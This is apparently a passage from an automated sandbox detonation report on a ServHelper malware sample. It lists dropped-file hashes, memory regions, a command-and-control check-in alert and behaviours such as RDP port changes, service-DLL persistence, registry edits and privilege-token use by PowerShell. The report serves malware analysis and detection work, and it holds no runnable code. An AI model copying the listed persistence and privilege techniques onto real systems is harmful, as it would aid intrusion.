SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/1224-75-0x000000001AB80000-0x000000001AB81000-memory.dmp

memory/268-76-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.cmdline

MD5 68a3697e32d417f2e9290858efcaa7c7
SHA1 40ab8410e13c5905fc5bff937c97b77d6f301ca1
SHA256 6fcf0da1bf1c50496186b7ce9e50166af41b3cfb020e58b29fed1852c09bf171
SHA512 6578a96e9a07e7224a23ef81db374982d9c19517db8f3af743941e58b5aa9d0acaac81cf7ed4140e701373fbc5189ee2907b870ddecea50e598c2f9d74fe8ead

\??\c:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/760-79-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\01ximcta\CSC1CD5A0B993214D799C33BD3EA94FE8DB.TMP

MD5 42603dc250c3469d8ff863b9671b6313
SHA1 91c7bce655a0491e0d50b6dab7dde14b221a01d3
SHA256 762182f7e8a444b1dcacbc73fd042f9d75d66f3d05dd03ef192ebaa8a6cb5047
SHA512 b41143d10349932df879c5acb612b9036b2eae6e3e788e86a651c0dd870492d1f51ca041b56d0860aa396b895005859e776637a113e636d1ac5a989056f75cce

C:\Users\Admin\AppData\Local\Temp\RES81DB.tmp

MD5 94d14dfed3873526664668b0b2aa023d
SHA1 2ed962b8f740d481a852519368d0d9d4cfea07b1
SHA256 1cebb023058d62c7383e6fd1c865e5197f522a6a09412d3c1beb802b105871ab
SHA512 230f221e9c082c2a3b5db10180a69ee837111d2a28324b562602d8d645951c433855a6065f973a5dcb1f0dafe8307dfeb925e28e9546da3bcb5601ea230d893e

C:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.dll

MD5 d990115e609be57a826dde95367044ad
SHA1 644a4c0e5be849aeea5b39bac10e0a7eebc063b8
SHA256 c8adc0962bbd0ab534eb18d0791056bd9adfabd8f638b621c9dc0d8f403d03d3
SHA512 706e77cb17f5d03354643ad996944f223d5f78c83dffd5666efd46bd922d15bbe4a668dbdeaef70efba1b0f63da57f38bb4500bcd769591b489ff9c6e26f6c6c

memory/1224-83-0x0000000001F50000-0x0000000001F51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9fca6b1768eba2c5d42f189123152e32
SHA1 560ec3249af6e8d82e994554475b870d32145352
SHA256 c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512 b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2

memory/1224-85-0x000000001B820000-0x000000001B821000-memory.dmp

memory/1224-86-0x000000001B8A0000-0x000000001B8A1000-memory.dmp

memory/1224-87-0x00000000025F0000-0x00000000025F1000-memory.dmp

memory/1552-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bd009f8192e4bf5c50d7ff2882d1bbe5
SHA1 4735a9e2f4a6188ed8d57639b0e0841a36150b83
SHA256 2cdd22d384c6c7d7a2ef71db040d83597dd7ea59a7d125e69bae11295300b124
SHA512 4b554b9d026b9d00e879004148f8028ee3b7420c6d05ac249b560649f9961feca01e835e86ad2871f9dc477b5ae5d7d38bd4f32c1e967406a0de2aefbdb62045

memory/1552-94-0x000000001ACD4000-0x000000001ACD6000-memory.dmp

memory/1552-93-0x000000001ACD0000-0x000000001ACD2000-memory.dmp

memory/1552-96-0x0000000002390000-0x0000000002391000-memory.dmp

memory/1552-98-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

memory/1552-100-0x000000001AC40000-0x000000001AC41000-memory.dmp

memory/1552-101-0x0000000002580000-0x0000000002581000-memory.dmp

memory/1224-102-0x000000001AC6A000-0x000000001AC89000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 097dc02256d474be1e33a9ffc66c910b
SHA1 aa0d1ead57b57cb7472fec127a9f013e2863ece9
SHA256 60eea41c8a20e29efe82cd3b3a252cb3f3ac1477ffe02ed6b912c2f6bcd37ecd
SHA512 bd4add82d5cbe9f5c545fcbc402642efac1a90b30dd373fc6b14ece46ad389ad56b7d89dfa97c0f7c9c4a7afa93467c2735cd742dfe9095930649a0ca24e0bed

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-22 06:21

Reported

2021-09-22 06:23

Platform

win10-en-20210920

Max time kernel

113s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

Signatures

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tl1c2fkk.jw4.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E23.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F01.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E82.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3EA2.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F12.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ho2h1bbl.ym0.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
